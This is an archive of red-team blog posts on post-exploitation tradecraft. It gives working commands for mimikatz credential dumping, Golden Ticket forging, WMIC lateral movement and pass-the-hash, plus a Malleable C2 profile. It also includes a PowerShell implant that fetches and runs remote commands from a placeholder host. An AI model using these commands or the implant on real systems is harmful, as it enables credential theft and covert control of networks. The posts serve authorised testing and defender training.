Archive for the ‘Red Team’ Category


My Favorite PowerShell Post-Exploitation Tools

February 25, 2015

PowerShell became a key part of my red team toolkit in 2014. Cobalt Strike 2.1 added PowerShell support to the Beacon payload and this has made an amazing library of capability available to my users. In this post, I’d like to take you through a few of my favorite collections of PowerShell scripts.


PowerSploit

Let’s start with PowerSploit. This is a post-exploitation toolkit originally put together by Matt Graeber with contributions from Chris Campbell, Joe Bialek, and others. When I use Beacon, this toolset is almost a drop-in replacement for features that I would normally need Meterpreter to get to.

For example, if I want to use mimikatz to dump plaintext credentials, I simply import the Exfiltration/Invoke-Mimikatz.ps1 script and call the Invoke-Mimikatz cmdlet. Simple.
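With Cobalt Strike 2.1’s PowerShell support, that’s two Beacon console commands. Here’s a rough sketch; the script path is a placeholder for wherever your copy of PowerSploit lives:

beacon> powershell-import /path/to/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1
beacon> powershell Invoke-Mimikatz -DumpCreds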

PowerSploit also features several great tools to steal credentials in other ways, log keystrokes, and take screenshots.

PowerUp

Every Christmas, I ask Santa for a privilege escalation vulnerability scanner. This has long made sense to me. When I have access to a system, I am in a good position to conduct automated reconnaissance and identify a known weakness to elevate with. Will Schroeder answered my wish with the PowerUp tool. This PowerShell script interrogates the system in several ways to find a privilege escalation opportunity. It even offers some helpful cmdlets to help you take advantage of the misconfigurations and weaknesses it finds. To use PowerUp I just import PowerUp.ps1 into Beacon and run the Invoke-AllChecks cmdlet.
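The pattern is the same as above. A quick sketch with placeholder paths; the follow-up cmdlet and its parameter are assumptions that vary with the PowerUp version you carry:

beacon> powershell-import /path/to/PowerUp.ps1
beacon> powershell Invoke-AllChecks
beacon> powershell Invoke-ServiceAbuse -ServiceName 'VulnerableSvc'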

PowerView

Last in my list is PowerView (also by Will Schroeder). This script is a full toolkit to interrogate a domain for hosts, users, and complex trust relationships. I probably use less than 10% of its potential capability right now. I tend to use PowerView to list hosts on a network and to quickly find out where I may have admin rights with my current token. This has become one of my first network reconnaissance tools and it has eliminated a need to scan for targets in many cases. My favorite PowerView cmdlets are Invoke-Netview and Invoke-FindLocalAdminAccess.
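For reference, my first few PowerView commands on a new Beacon usually look something like this (a sketch; the script path is a placeholder and the cmdlet names match the 2014-era PowerView):

beacon> powershell-import /path/to/PowerView.ps1
beacon> powershell Invoke-Netview
beacon> powershell Invoke-FindLocalAdminAccess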


Another Night, Another Actor

February 19, 2015

Early last year, I had a frantic call from a customer. They needed to make a small change to Beacon’s communication pattern, and quickly. This customer was asked to spend a week with a network defense team and train them on different attacker tactics. Each day, my customer had to show the network defense team all of their indicators and walk them through each of their activities. After a few days, this network defense team was able to zero in on Cobalt Strike’s Beacon, and they were having trouble conducting other types of training activity because of this.

A blue training audience gets the most benefit from a red team’s activity when the red team shares their indicators, tactics, and knowledge with them. Clear indicator information allows the blue team to look at their sensors and see what they missed when they tried to put the story together. An open discussion of favored tactics (e.g., ways to do lateral movement, techniques like the Golden Ticket, etc.) allows a blue team to address major gaps in their defenses.

For red teams, openness comes at a cost. Tools and capabilities are expensive to buy or time-consuming to build. A red team’s effectiveness comes down to skilled operators and tools that give them freedom to work in a network. You need both. A poor operator will misuse a good tool. Depending on the maturity of the training audience and environment, a skilled operator may find themselves completely unable to operate without good tools to support them.

When a red team gives up all of their operating information, they’ve given their training audiences a gift-wrapped roadmap to detect their activity now and into the future. It’s a lot harder to play the role of an unknown adversary when your tools are well understood by the training audience.

To deal with this problem, most red teams choose to keep information about their tools and tactics close hold. They’re relying on a strategy of obscurity to protect their investment and to extend the productive life of their current technologies. This is directly at odds with what a red team should offer.

I think about this problem a lot. I sell a public solution that allows red teams to operate. I do not have the luxury of obscurity. I also don’t want obscurity. I want the training audiences I work with to get the most benefit possible from the red team activity my customers and I conduct. This means my customers need to feel safe disclosing details about their operations and their use of my tools.

I’ve made some headway on this problem and it’s one of the things in Cobalt Strike I’m most proud of.

On-disk, Cobalt Strike has its Artifact Kit. This is my source code framework to build all of Cobalt Strike’s executables and DLLs. My customers get the source code to this framework and they have the freedom to change this process and introduce other techniques to evade anti-virus. Cobalt Strike also plays nice with the Veil Evasion Framework. It’s trivial to export one of Cobalt Strike’s proprietary stagers in a Veil-friendly format too.

Network indicators are another story. Once a blue team understands what your tool looks like on the wire, it’s generally game over for that capability. Cobalt Strike has a good handle on this problem too. Malleable C2 lets Cobalt Strike’s end-users change Cobalt Strike’s indicators on the wire.

Specifically:

You get to transform and define where in a POST and GET transaction Beacon stores its metadata, output, and tasks. If you want to base64 encode an encrypted task and wrap it in HTML you’re welcome to do that. If you want to stick your encrypted tasks in the middle of an image, this is trivial to do too.

You get to dress up your transaction with extra indicators. You can add whichever client and server headers you want to HTTP POST and GET transactions. You can add arbitrary parameters to your GET and POST requests. You also get to define the URLs used for each of these.

These two pieces combined together give you a lot of control over what Cobalt Strike’s Beacon looks like on the wire. If you want, you can look like known malware. Or, you can blend in with existing traffic. Or, do something in between to adjust your activity to what your training audience is ready for.
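To make that concrete, here’s a rough sketch of a Malleable C2 profile. Every URI, header, and transform below is a made-up placeholder, not a recommendation; the grammar is the part to pay attention to:

http-get {
    set uri "/search/results";

    client {
        header "Accept" "*/*";

        metadata {
            base64;
            prepend "session=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "text/html";

        output {
            base64;
            prepend "<!-- ";
            append " -->";
            print;
        }
    }
}

http-post {
    set uri "/search/submit";

    client {
        id {
            parameter "sid";
        }

        output {
            base64;
            print;
        }
    }

    server {
        output {
            base64;
            print;
        }
    }
}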

Now, what about that customer? Sadly, Malleable C2 didn’t exist at the time of that call. We were able to figure out a one-off work-around for their situation. Today it’s a different story. Between Artifact Kit and Malleable C2, it’s quite feasible to make Cobalt Strike look like a new actor. You can do this on a weekly or even daily basis, if you need to. This flexibility is a big step towards resolving the openness versus future effectiveness conflict.


DNS Communication is a Gimmick

February 4, 2015

I added DNS Communication to Cobalt Strike in June 2013 and refined it further in July 2013. On sales calls and at conferences I get a lot of questions and compliments on this feature. That’s great.

I’ve also heard the opposite. I’ve heard folks say that DNS Command and Control is noisy. It’s “easy to detect”. I’ve had someone go so far as to say that it’s a gimmick.

I have a philosophy: I like options. I have a preferred way to work. I stay aware of how this preferred way may break down. When this happens, I like to know I can still work and get things done. Cobalt Strike’s DNS C2 is a great example of how this philosophy influences my development choices.

I released Beacon in the 27 Sept 2012 release of Cobalt Strike. This first Beacon could beacon over DNS or HTTP. The DNS beacon would periodically make an A record request to a domain that I, the attacker, am authoritative for. My server would provide a response that told the Beacon whether or not it should make an HTTP request to download its tasks. I built this Beacon for stealth. By checking for requests with DNS, I limit how often my compromised systems need to connect directly to me.

[Diagram: DNS Beacon check-in via periodic A record requests]

The above is not easy to detect. I’ve had folks tell me that they see this behavior in production. One A record request every 24 hours, or even once a week, is not trivial to find. This is scary.

In the first half of 2013 I had several opportunities to use Cobalt Strike. I took advantage of the DNS Beacon as a persistent agent. During this time I ran into a scenario I call “the child in the well”. I would see a compromised host beacon, but it would never connect to me to download its tasks. This is a terrible situation. My compromised system can call out to me. I know it’s there. But, I can’t reach it. This happened to me twice and I knew I needed to do something about it.

I added a mode command to the DNS Beacon. This command allows the end-user to state which data channel Beacon should use to download its tasks. When a tasking is available, I communicate this channel preference to the DNS Beacon in my 4-byte A record response.

I added modes to communicate over HTTP, DNS A records, and DNS TXT records. Each of these channels has its purpose, and I allow the user to switch back and forth between them for each deployed DNS Beacon.

The HTTP data channel is the default. The compromised system connects to me with a GET request to download its tasks. It uses a POST request to send output when it’s available.

If I run into a child in the well scenario I have a choice between the two DNS data channels.

I used to use Beacon primarily as a lifeline to send sessions to other team servers. The A record channel is in the spirit of this original use case. I can task the Beacon and it will download its tasking 4 bytes at a time. If the system can beacon to me, then I have some option to control it. The A record data channel isn’t efficient, but it works in a pinch.

I added the TXT record channel at the same time I built a SOCKS proxy server into Beacon. This was July 2013. I built these capabilities into Beacon to keep with an offense in depth philosophy. If I can’t get out of a network on any channel except DNS, I need a way to continue to work. I saw pivoting as essential to this and so I built the SOCKS proxy server. The TXT record channel is suitable for tunneling some traffic through a Beacon.
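In the console, switching channels is one command per Beacon. A sketch of how I tend to drive it, assuming the mode names from the 2013-era releases:

beacon> mode dns-txt
beacon> socks 1080
beacon> mode http

The first line moves a child-in-the-well host onto the TXT record data channel, the second stands up a SOCKS proxy through that Beacon for pivoting, and the third drops back to the default HTTP data channel once egress opens up.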

I hope this post helps shine light on how I use DNS for covert communication. As a beacon with a high sleep time, it’s stealthy. As a data channel, it’s useful when there are no other options. Which option makes sense will depend on your context. The ability to match the tool to the context comes from mature tradecraft.


Pass-the-(Golden)-Ticket with WMIC

January 7, 2015

One of my favorite blog posts from last year was the Adversary Tricks and Treats post from CrowdStrike. They showed how one of the actors they track changed their tactics to cope with a more alert defender.

This actor, DEEP PANDA, sometimes injects a Golden Ticket into their local Kerberos ticket cache. To move laterally, this actor uses this trust to enable the RDP sticky keys backdoor on target systems. The actor then RDPs to the target and uses this backdoor to get a SYSTEM-level command shell. Nothing to it.

When I read about interesting tradecraft, I like to reproduce it in a lab. According to CrowdStrike, this actor uses wmic to pass the Golden Ticket and execute their commands on the target systems.

I stood up a test system and used kerberos_ticket_use in Beacon to ingest a Golden Ticket. I then tried to execute a command on a Windows 8 system with WMIC:

wmic /node:WIN8WORKSTATION process call create "stuff I want to run"

This command failed with an access denied. Picture a Sad DEEP PANDA face here. After some digging, I found that there’s a flag I need to specify. To pass a Kerberos ticket with WMIC, use /authority:"kerberos:DOMAIN\TARGET" on your WMIC command line. So in this case:

wmic /authority:"kerberos:CORP\WIN8WORKSTATION" /node:WIN8WORKSTATION process call create "stuff"
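Putting it all together, the lab sequence looked roughly like this. The domain, SID, and krbtgt hash are placeholders; generate the ticket with mimikatz first, then feed it to Beacon:

mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-<domain SID> /krbtgt:<krbtgt NTLM hash> /ticket:golden.kirbi
beacon> kerberos_ticket_use c:\tickets\golden.kirbi
beacon> shell wmic /authority:"kerberos:CORP\WIN8WORKSTATION" /node:WIN8WORKSTATION process call create "stuff"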

That’s how you pass a Golden Ticket with WMIC.


How did your hacking-style change in 2014?

December 30, 2014

The end of the year is always a good time for reflection. As you close out your year, I encourage you to ask: how did your style of hacking change and evolve in 2014? I suspect most of us have some answer to this question. We’re always learning and becoming informed by new tricks.

Here’s how my personal hacking-style has changed in 2014.

PowerShell for Post Exploitation

There’s a lot of enthusiasm for PowerShell in the offensive community. I feel that these enthusiasts are split into two camps though. One camp advocates PowerShell as a tool to bootstrap a payload without worrying about anti-virus. Another camp develops all of their post-exploitation tools in PowerShell and operates through these tools.

This year, I came into the second camp. I would always acknowledge that there was great capability in PowerShell. But, the difficulty using these scripts with the tools I know [Meterpreter, Beacon] prevented me from experiencing it first hand.

This year, I took the time to integrate PowerShell into Cobalt Strike’s Beacon payload and remove this hurdle. Immediately, my eyes were opened to a whole universe of post-exploitation tools I didn’t have before.

Veil PowerUp has changed how I elevate my privileges. Now, one of my standard items is to use PowerUp to find misconfigurations on the compromised target before I look at other options.

Veil PowerView has changed how I interrogate a network, enumerate trusts, and look for targets I can jump to laterally.

And, PowerSploit combined with Beacon provides a very respectable post-exploitation toolkit.

Almost all of my post-exploitation is asynchronous now. I go interactive only when I need to tunnel another tool through a Beacon.

Lateral Movement without PsExec

My tools tend to expose the Metasploit Framework’s workflow for lateral movement. Dump hashes and use the psexec module to get a session on a host. Or, steal a token and use current_user_psexec to get to that host. If current_user_psexec fails [it will], know how to run an artifact on a remote system the manual way.

The workflow for lateral movement I use today is much different. In late 2013, I introduced the named pipe communication channel into Beacon. I saw some interesting possibilities for this channel, but during use, I could tell the supporting features were missing. These came in February 2014. I added the ability to generate artifacts that contain the entire Beacon payload, and Beacon gained tools to elevate privileges and steal tokens.

The above was enough to move my lateral movement workflow away from Metasploit’s workflows. I now capture a trust through Beacon [net use, steal a token, import a kerb ticket] and use wmic, at, sc, or schtasks to run an artifact I copy to the remote target. This artifact is almost always an SMB Beacon. This is the Beacon variant that waits for me to link to it over a named pipe. This is very stealthy and it’s a very powerful way to use Beacon. Almost all of my lateral movement is asynchronous now.
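One pass through this workflow, sketched as Beacon console commands. The process ID, hostname, and artifact name are placeholders; the artifact itself is an SMB Beacon executable exported from Cobalt Strike:

beacon> steal_token 2304
beacon> upload update.exe
beacon> shell copy update.exe \\FILESERVER\C$\Windows\Temp\update.exe
beacon> shell wmic /node:FILESERVER process call create "C:\Windows\Temp\update.exe"
beacon> link FILESERVER

The steal_token call captures the trust, the upload/copy/wmic lines push and run the artifact, and link connects to the new SMB Beacon over its named pipe.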

Persistence without Malware

Another big change to my process came from Mimikatz and the Golden Ticket technique. This technique allows me to use the krbtgt hash taken from a domain controller to generate valid Kerberos tickets for any user I like. These tickets are not tied to the user’s password at all. This technique has changed how I do persistence. Now, I tend to pull the information I need to generate tickets at will and store it in an attacker-accessible Wiki. When I need access to a server or some other key asset, I generate a ticket, import it into Beacon, take the server, and then pull off of it when I’m done.

For defenders used to finding malware and cleaning it up, this is a big mental shift. They can’t just delete a bad binary and assume their network is clean. They have to think about which trusts the attacker had access to and how that might allow the attacker to reclaim control of their network at will. It’s an interesting problem.

I’ve always appreciated living on hosts without malware. In exercises, the sticky keys backdoor is useful. Periodically using Mimikatz to pull credentials to (re)use later is also a way to hold access. These techniques are fine but they carry risk [the RDP backdoor is easy to find, vigilant admins change their passwords]. The Golden Ticket allowed me to have confidence in and rely on malware-free persistence in a way that I just couldn’t before.

In terms of my tradecraft and thinking about how I “hack”, these are the three things that changed for me in 2014. What changed for you?


What’s the go-to phishing technique or exploit?

December 17, 2014

This blog post is inspired by a question sent to a local mailing list. The original poster asks, what’s the go-to phishing technique or exploit in a blackbox situation? Here’s my response:

I’ve had to do this before, I sell tools to do it now, and I’ve seen how others teach and go about this particular process. First, I recommend that you read MetaPhish. No other paper or talk has influenced how I think about this process more.

You’ll notice I said the word process. Before you dig into a toolset, you’ll want to figure out the process you’re going to use. Here’s what I used and it has parallels with the processes I see others use now [regardless of toolset]:

0. Information Gathering

Find out about your target, harvest email addresses, etc. etc. etc.

1. Reconnaissance

This is the phase where you sample the target’s client-side attack surface. I used to send a few fake LinkedIn invitations across an org and direct those folks to a web app that profiles their browser. Similar information to what you see here: http://browserspy.dk/

I’ve seen some organizations use BeEF for this purpose and Black Squirrel does this as well.

2. Stand up a Test Environment

Next, I recommend that you create a virtual machine to mirror their environment as closely as possible. Install patches and other tweaks you think may be present. This isn’t the place to underestimate their posture. I’d also recommend trying out the different A/V products you expect to see at this point. Use the information from the reconnaissance step to make this as exact as possible.

3. Choose your attack

Now, you will need to select an attack to use against your target. I really recommend that you stay away from the memory corruption exploits in the Metasploit Framework. You can tweak them to get around some anti-virus products. But, you really need to pay attention to the exploit’s needs. For example, let’s say the target profile reveals a vulnerable version of IE and Metasploit has an exploit for it. What are the dependencies of that exploit? Does it also require Java 1.6 to help it get past some of Windows’ protections? You could play this game. Or, you could skip it altogether.

Many folks who execute these kinds of engagements regularly use user-driven attacks. A user-driven attack is an attack that relies on normal functionality and fooling the user into taking some detrimental action. The Java Applet attack is an example of a very popular user-driven attack. I’m surprised it still works today, but *shrug*. Embedding a macro into a Word document or Excel spreadsheet is also effective.

The stock VBA macro you can get out of MSF is also pretty good [it injects straight into memory]. I understand that BeEF has some options in this area too, but I haven’t played with them.

4. Pair your attack with a payload

Don’t take it for granted that you’ll walk out of your target’s network with a Metasploit Framework payload. I see egress as one of the toughest problems when working with a harder target. If you have to use a Metasploit Framework payload, windows/meterpreter/reverse_https is your best bet here. I recommend that you look for and consider other options though. A lot of organizations who do this kind of work have a custom payload or they buy one. If I were in a hurry to cobble up a process and didn’t have a budget, I’d look at building something in PowerShell (a rough sketch follows after this list). The main things you care about:

a. Is the payload proxy aware? Will it take the same actions that the user’s browser would take to get out to the internet?

b. Can I match the payload’s characteristics to the target environment? For example, making its User-Agent match something legitimate?

c. If I opt to go SSL, can I use a legitimate certificate? If not, does the payload at least try to look like legitimate traffic if I communicate without SSL?

d. Is the payload asynchronous? You really want something reliable that doesn’t stand out while you figure out what to do next on your target’s network.

e. Can I pair this payload with my attack? This is an important consideration. If you have a great piece of custom malware but *can’t* pair it with your chosen attack, it’s not useful to you for this phase of your engagement.

Your custom payload [bought/built] does not need to be fully functional. Its main goal is to defeat egress restrictions and act as a lifeline while you figure out the best steps to fortify your access [if that’s what your customer wants]. The main thing it needs to be able to do is spawn another payload.
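Here’s the kind of PowerShell I have in mind, a bare-bones sketch of an asynchronous, proxy-aware check-in loop, not a finished payload. The controller URL, User-Agent string, and sleep window are placeholders; the loop just asks a controller for a command, runs whatever comes back (which could be a stager for a fuller payload), and posts the output:

$c2 = "https://updates.example.com/check"
while ($true) {
    try {
        $wc = New-Object System.Net.WebClient
        # ride the system proxy with the logged-on user's credentials, like the browser would
        $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy()
        $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials
        # placeholder User-Agent; match it to what you saw during reconnaissance
        $wc.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0)")
        $task = $wc.DownloadString($c2)
        if ($task) {
            # run the tasking and send the output back; a real task might stage a full payload
            $out = Invoke-Expression $task | Out-String
            $wc.UploadString($c2, $out)
        }
    } catch { }
    # asynchronous: check in every 5-15 minutes with a little jitter
    Start-Sleep -Seconds (Get-Random -Minimum 300 -Maximum 900)
}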

Here’s one of my favorite talks on how to pull something like this together quickly.

I also recommend that you set up infrastructure for each piece of this attack. You should send phishes from different places. You should host your recon app on its own server. The server your user-driven attack stages your payload from should differ from the server the payload actually communicates with [if your payload is delivered in stages]. Ideally, your asynchronous lifeline payload should call home to multiple hosts in case one of them becomes blocked.

5. Deliver the package

The final phase is to send the package on to your target. I don’t recommend that you spray every email you found. If your goal is to demonstrate a targeted attack, be targeted.

Personally, I’m a stickler for pixel perfect phishing emails and I’m not a fan of crafting an HTML email in a hacker tool to achieve this. If in doubt, I recommend that you use the same email client that your legend [the person you’re pretending to be] would use to send the email. If your target is someone in HR and your legend is someone applying for a job, use Gmail to send your phish. Preferably, the same Gmail account noted in the resume.doc you embedded a macro inside of.

Before you phish, I recommend that you send your package to yourself, through infrastructure that mirrors your target environment as closely as possible. If your target uses a cloud email service, try to get an account on the free or low-tier paid version of this service and send your package to yourself there. If your target uses a more traditional Exchange+Outlook setup, see if you can build a lab with those pieces or rely on a friend who has access to something similar. The main point here is to make sure your lovingly crafted bundle of good isn’t going to the spam folder. It’d be a shame to go through all of this work to get stopped by that.

Even if you have a favorite “go to” user-driven attack, I recommend executing this process anyway. You don’t want to fire an attack package crafted for a Windows environment only to find that your target is a Mac OS X shop.

Tradecraft parts 3, 4, and 8 cover these topics.


Give me any zero-day and I will rule the world

October 30, 2014

A few months ago, I was having lunch at a favorite Italian restaurant in Washington, DC. I work in a residential area, which means lunch time is slow and there’s no crowd. This leads to many conversations with the staff. This particular conversation drifted to Time Magazine’s July World War Zero article about the sale of zero-day exploits.

What a strange world we live in. Zero-days are now common lunch conversation almost along the lines of talking about the weather.

I applaud the work our industry has done to educate the public about the risk of software vulnerabilities. That said, there is a down side. Most people, some who even work in security, only understand hacking as the exploitation of software vulnerabilities. They don’t think about the rest of the intrusion process or envision what steps the attacker takes after the compromise.

I see exploits as a small part of the hacking puzzle. If someone has an unpatched known vulnerability–bad on them and yes, they should address it. But, there are other ways to get a foothold in a network besides memory corruption exploits. Some targeted attacks involve sending documents or files that abuse known functionality. These attacks are low on the sophistication scale, but I know many penetration testers who continue to get footholds with Java Applet attacks. A memory corruption exploit might assist with the foothold, but it’s not a requirement to gain one.

Following the foothold is post-exploitation. A common attacker goal is to escalate privileges and capture a trust relationship that allows them to move within a domain. Here’s another place a memory corruption exploit may help. A memory corruption exploit against the local system may give me a free pass to elevated rights. Again, there are other ways to get this control. If the user is a local administrator, the attacker has full control of the current system. UAC is not a security boundary and in many cases, it’s trivial to bypass. And yes, the bypass can work on Windows 8.1. Let’s say the user isn’t a local administrator. Surely, one must have a memory corruption exploit to work, right? Wrong. Take a look at harmj0y’s PowerUp. This is a PowerShell script to search for opportunities to elevate based on weak permissions or configuration mistakes. A memory corruption exploit might assist with privilege escalation, but it’s not a requirement to escalate privileges.

Let’s discuss lateral movement and domain privilege escalation.

Lateral movement is the process where an attacker abuses trust relationships to gain control of other systems on the same domain. Lateral movement has its challenges. The attacker has to impersonate a user that a target system recognizes as an administrator. This trust information comes in many forms. An attacker might dump the hashed passwords of local users on the system. If the Administrator account password is the same on another system, the attacker may use this password hash to authenticate to that system and carry out privileged actions. This is the pass-the-hash attack and it does not involve memory corruption. Another form of trust is an access token. This is a data structure, managed by Windows, that contains everything needed to allow a seamless single sign-on experience. An attacker can capture one of these tokens and apply it to their current session. Now, the attacker has the rights spelled out in this token and they may use it to interact with another system [if the target sees the user as an administrator]. This process does not require a memory corruption exploit.
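As a sketch of the pass-the-hash half of this (the hash and names are made up; the mimikatz syntax is the piece to note):

mimikatz # sekurlsa::pth /user:Administrator /domain:<machine or domain name> /ntlm:<recovered NTLM hash> /run:cmd.exe

The spawned cmd.exe holds a logon backed by that hash. A simple dir \\FILESERVER\C$ from it will succeed if the target system honors the Administrator trust, all without a memory corruption exploit.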

Domain privilege escalation is the process where an attacker takes over systems to capture new trusts, until they find a trust that gives them full control of the domain or gets them the data they’re after. If an attacker captures a token for a Domain Administrator user, it’s game over. The attacker has access to all systems joined to that domain. If the attacker captures a token for a domain user with administrator rights to some systems, the attacker may leverage that token to take control of those systems. This process does not require a memory corruption exploit.

It gets worse. With full control of the domain, the attacker can steal the secret that the domain’s security rests on. This is the password hash of the krbtgt user on a domain controller. If the attacker captures this information, the attacker has the freedom to leave your network for weeks, months, or years at a time. The attacker may come back through a phishing attack and apply a self-generated Kerberos ticket to their current session. With this shared secret in hand, the attacker may create a ticket that allows them to gain the rights of any domain user–without knowledge of that user’s password. In effect, this means the attacker may regain domain administrator rights at any time. This is the Golden Ticket Attack in Mimikatz and it does not require a memory corruption exploit.

I think memory corruption is cool, but hacking goes far beyond it. Hacking is understanding a system well enough to make it do things others didn’t intend. When I teach hacking now, I don’t cover memory corruption exploits. Too many people are stunted by this idea that they must scan for vulnerabilities, find one, and exploit it. This is old thinking. We should teach people that a well-built memory corruption exploit is one access or privilege escalation technique of many. By far, it’s not the whole game.

A penetration test that focuses on vulnerabilities and ignores most of the attack process doesn’t help a customer defend their network better. As offensive professionals, it’s on us to know the steps attackers take and to arm ourselves with knowledge and tools to reproduce them. If we can’t persist, move laterally, steal data, and defeat defenses in a credible way, what use are we to help customers understand their security posture? Creative thinking about these problems won’t happen if we focus too much on one (optional) piece of the hacking process.
